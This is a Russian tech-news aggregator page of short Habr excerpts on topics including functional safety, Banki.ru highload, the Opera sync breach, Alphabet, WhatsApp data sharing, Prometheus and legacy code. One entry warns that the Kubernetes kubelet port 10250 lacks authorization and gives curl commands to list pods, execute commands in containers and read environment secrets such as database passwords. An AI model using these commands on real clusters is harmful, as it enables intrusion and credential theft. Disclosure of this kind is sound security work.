Функциональная безопасность – старшая сестра информационной безопасности

Автор: admin от Вчера, 23:10, посмотрело: 12

Функциональная безопасность – старшая сестра информационной безопасности

Безопасности на хабре посвящен целый хаб, и, пожалуй, никто особенно не задумывается, что именно вкладывается в понятие «безопасность», и так все ясно: информационная безопасность (security). Однако, есть еще и другая сторона безопасности, safety, связанная с рисками для здоровья и жизни людей, а также окружающей среды. Поскольку информационные технологии сами по себе опасности не представляют, то обычно говорят о функциональной составляющей, то есть о безопасности, связанной с правильным функционированием компьютерной системы. Если информационная безопасность стала критична с появлением интернета, то функциональная безопасность рассматривалась и до появления цифрового управления, ведь аварии происходили всегда. Информационной безопасности АСУ ТП посвящено немало статей на хабре. Функциональной безопасности авторы тоже касались, как в хабе по SCADA, так и в хабе по промышленному программированию АСУ ТП, но, как мне показалось, несколько вскользь. Поэтому я предлагаю короткую информацию об этом важном свойстве, от которого напрямую зависит, получит ли SkyNET контроль над человечеством.
В статье сделаны некоторые обобщения для АСУ ТП, а также для встроенных и кибер-физических систем.

Категория: Программирование, Веб-разработка, Информационная безопасность

 

Всему своё время

Автор: admin от Вчера, 22:30, посмотрело: 12

Всему своё время


Банки.ру — проект с 10-летней историей. В разные времена banki.ru испытывали разные нагрузки. Портал перестраивался под новые требования как логически, так и технологически, что-то мы меняли в авральном режиме, что-то — эволюционным путём. Сейчас средняя посещаемость примерно 2 миллиона просмотра страниц, т.е. проект уже не маленький, но ещё и не совсем большой.


Эта статья — расшифровка доклада Романа Ивлиева (CIO Banki.ru) на обучающей конференции HighLoad++ Junior, которая прошла пару месяцев назад в Москве в рамках фестиваля “Российские интернет-технологии”.


В этой статье мы хотим поговорить об оптимизации, её своевременности, и о субоптимизации, о том, что далеко не всегда лучшие практики разработки нагруженных систем идут на пользу бизнесу.


Посмотрим примеры и поищем ответы на вопросы:



  • Настолько ли ваш highload — highload?

  • Считать ли хабрэффект поводом для внедрения высоких технологий?

  • «Костыль» или «высокотехнологичное решение» — что выбрать? Плюсы и минусы.

  • Как выбрать момент для начала новой эры? Есть ли критерии, когда имеет смысл начинать оптимизировать ваше приложение и внедрять крутые штуки «по-взрослому».

  • Как можно использовать «список Бунина» для достижения очень неплохих показателей, и все ли пункты реально нужны вам?

  • Как работать с техническим долгом, чтобы он не зарастал мхом?


  • В заключение Роман Ивлиев расскажет про несколько примеров из жизни banki.ru в части замены технологических решений в области высоких нагрузок, и что из этого вышло.

    Категория: Программирование, Веб-разработка

     

    Opera призывает своих пользователей сменить пароли

    Автор: admin от Вчера, 22:30, посмотрело: 14

    Opera выпустила уведомление безопасности, в котором призывает пользователей своего сервиса Opera sync как можно скорее сменить свои пароли аккаунтов. Сообщается, что один из серверов компании оказался скомпрометированным и злоумышленники получили доступ к информации аккаунтов, включая, логины и пароли пользователей (в зашифрованном виде). Для сброса пароля от аккаунта следует воспользоваться этой ссылкой

    Opera призывает своих пользователей сменить пароли

    Earlier this week, we detected signs of an attack where access was gained to the Opera sync system. This attack was quickly blocked. Our investigations are ongoing, but we believe some data, including some of our sync users’ passwords and account information, such as login names, may have been compromised.
    https://habrahabr.ru/post/308638/?utm_source=habrahabr&utm_medium=rss&utm_campaign=interesting#habracut

    Категория: Информационная безопасность

     

    Хобби-проекты: lets-meet.ru — куда пойдем в пятницу

    Автор: admin от Вчера, 22:05, посмотрело: 11

    Хобби-проекты: lets-meet.ru — куда пойдем в пятницу
    Автор: Артем Трубачев

    Идея создания этого приложения родилась, когда мы с коллегами в очередной раз собирались пойти в бар, но никак не могли договориться о дате. Все мы люди взрослые, и свободного времени у нас, конечно, мало. lets-meet.ru создан как раз чтобы определить, когда всем будет удобнее собраться.

    В двух словах, это работает так: вы создаете встречу и указываете варианты даты, время и места. Также можно добавить дополнительные вопросы.

    Категория: Программирование » Веб-разработка

     

    На каких основаниях Alphabet претендует на членство в «клубе четырех запятых»

    Автор: admin от Вчера, 21:45, посмотрело: 10

    На каких основаниях Alphabet претендует на членство в «клубе четырех запятых»

    Alphabet возник чуть более года назад, в результате реструктуризации Google. Все акции Google были полностью конвертированы в акции Alphabet без каких-либо изменений их параметров. Холдинг Alphabet стал новым игроком на рынке, в состав которого на правах дочек вошли сама Google и все ее предыдущие проекты – в частности Calico, Fiber, Google Ventures, Google Capital, Google X, Life Sciences и Nest. Это, по мнению представителей компании, должно было обеспечить их большую самостоятельность и более четкую структуру руководства.

    В ведении Google останется поисковая система, а также карты, рекламный бизнес, сервис Google Play Store, видеохостинг YouTube и разработка операционной системы Android, а также Chrome, Google Apps и социальная сеть Google+.

    Пока большинство наиболее прибыльных подразделений всё ещё принадлежат Google. Далеко не все проекты, которыми теперь управляет Alphabet, показывают удовлетворительные результаты.

    Категория: Google, Apple

     

    Предостережение для пользователей Kubernetes

    Автор: admin от Вчера, 19:55, посмотрело: 14

    Сервис kubelet, с которым тесно общается apiserver, слушает порт 10250. Этот порт хоть и использует сертификаты, но лишь для шифрования канала, никакой авторизации на нём нет.


    Об этой проблеме известно давно, но почему-то никто не считает её серьезной. Ссылки на обсуждения:



    • https://github.com/kubernetes/kubernetes/issues/3168

    • https://github.com/kubernetes/kubernetes/issues/7965

    • https://github.com/kubernetes/kubernetes/issues/11816


    Что с этим можно сделать? Правтически всё. Без регистрации и sms.


    Получить список всех pod'ов:


    $ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

    Выполнить команду внутри контейнера? Запросто:


    $ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

    Получить пароль на базу данных? Проще простого:


    $ curl -k -XPOST "https://k8s-node-1:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env'

    Вытащить из неё данные тоже не составит труда.

    https://habrahabr.ru/post/308628/?utm_source=habrahabr&utm_medium=rss&utm_campaign=interesting#habracut

    Категория: Программирование

     

    WhatsApp собирается делиться данными своих пользователей с Facebook

    Автор: admin от Вчера, 19:05, посмотрело: 11

    WhatsApp собирается делиться данными своих пользователей с Facebook Мы не так давно хвалили WhatsApp в своем корпоративном блоге за внедрение в мессенджер полноценного E2E шифрования и протокола Signal. Такое решение безопасности оставило далеко позади многих конкурентов этого очень популярного мессенджера. Однако, на сей раз речь пойдет о новой его функции, которая наверняка не будет воспринята пользователями положительно. В своем новом посте в блоге, авторы мессенджера указывают на то, что теперь часть данных пользователя, например, его номер телефона будет известна Facebook. Именно для этого компания обновила свое соглашение о конфиденциальности.

    Категория: Компании » Facebook

     

    Prometheus — практическое использование

    Автор: admin от Вчера, 17:50, посмотрело: 12

    Одной из важнейших задач при разработке приложений с микросервисной архитектурой является задача мониторинга. Слежение за состоянием сервисов и серверов позволяет не только вовремя реагировать на неисправности, но и анализировать их работу. Наличие такой информации трудно переоценить, ведь она предоставляет дополнительные возможности по улучшению производительности и качества работы Вашего ПО.

    Prometheus — практическое использование

    К счастью, существует множество решений задачи мониторинга, как платных, так и бесплатных. Я же хочу поделиться опытом практического использования open source системы мониторинга Prometheus.

    Категория: Админитстрирование » Системное администрирование

     

    Разработка игры с использованием пластилиновой анимации

    Автор: admin от Вчера, 17:40, посмотрело: 12

    В конце первой части статьи описывались общие методы съёмки пластилиновой анимации, в этой части я расскажу об особенностях съёмки и обработки конкретно для использования в игре и создании игры с использованием созданной анимации.

    Разработка игры с использованием пластилиновой анимации

    Категория: Программирование » Веб-разработка

     

    О Legacy-коде без максимализма: что делать

    Автор: admin от Вчера, 17:25, посмотрело: 12

    О Legacy-коде без максимализма: что делать

    Представьте, что вам дали задачу поправить часть кода. В голове возникнет много мыслей. Кто его написал? Когда? А может он — legacy? Где документация? Давайте попробуем разобраться с «наследием» основательно и со всех сторон. Поможет нам в этом вопросе Андрей Солнцев @asolntsev (http://asolntsev.github.io/), разработчик из таллинской компании Codeborne. Начнём.

    О Legacy-коде без максимализма: что делать— Андрей, вы знакомы с трудами Michael Feathers, например, «Working Effectively with Legacy Code»? В книге акцентируется внимание на важности тестирования и выделяется одно из ключевых отличий legacy от не legacy-кода — это наличие тестов. Вы согласны с этим мнением?

    Абсолютно согласен! Скажу больше: юнит-тесты — необходимое, но недостаточное условие. И с юнит-тестами можно навалить так, что сам Геракл не разгребёт.
    Что для настоящего джедая мастхав, так это:

  • TDD — то есть тесты ДО кода.

  • Чистый код (и чистые тесты).



  • Я очень люблю книгу Robert C. Martin «Clean Code» («Чистый код»). Это для меня настольная библия. Категорически всем советую. Кстати, его блог тоже великолепен.

    Категория: Программирование, Веб-разработка

     
    Назад Вперед